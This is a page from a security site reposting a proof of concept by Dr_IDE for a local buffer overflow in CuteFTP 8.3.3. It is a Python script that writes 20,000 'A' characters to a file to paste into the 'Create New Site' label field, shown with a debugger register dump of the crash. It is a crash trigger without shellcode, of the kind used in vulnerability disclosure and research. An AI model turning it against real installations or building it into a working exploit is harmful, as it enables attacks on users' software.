首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CuteFTP version 8.3.3 Home/Pro/Lite create new site local buffer overflow proof
来源:vfocus.net 作者:Dr_IDE 发布时间:2009-09-27   
#!/usr/bin/env python

#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Download: 	http://www.cuteftp.com/downloads/
# Tested On:	Windows 7 RC, XP might be more shell friendly
# Notes: 	This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# 		Because of differences in the internal process of each site type you may be able to get
#		execution through one of these channels.
#
#####################################################################################################

"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""

buff = ("\x41" * 20000)

try:
	f1 = open("CuteFTP.txt","w");
	f1.write(buff);
	f1.close();

	print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
	print "By: Dr_IDE"
	print "\nFile Created Successfully.\n"
	print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
	print "[-] Error. File couldn't be created."
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·html2ps versions 1.0 beta5 and
·VLC Media Player version 1.0.2
·Sun Solaris 10 RPC dmispd Remo
·Core FTP LE version 2.1 build
·CDBurnerXP version 4.2.4.1351
·BigAnt server versions 2.50 SP
·BigAnt server versions 2.50 SP
·Adobe Photoshop Elements 8.0 A
·Oracle Document Capture BlackI
·HP LoadRunner version 9.5 Pers
·PHPCMS 2008 (job.php \$genre)
·Oracle Document Capture BlackI
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved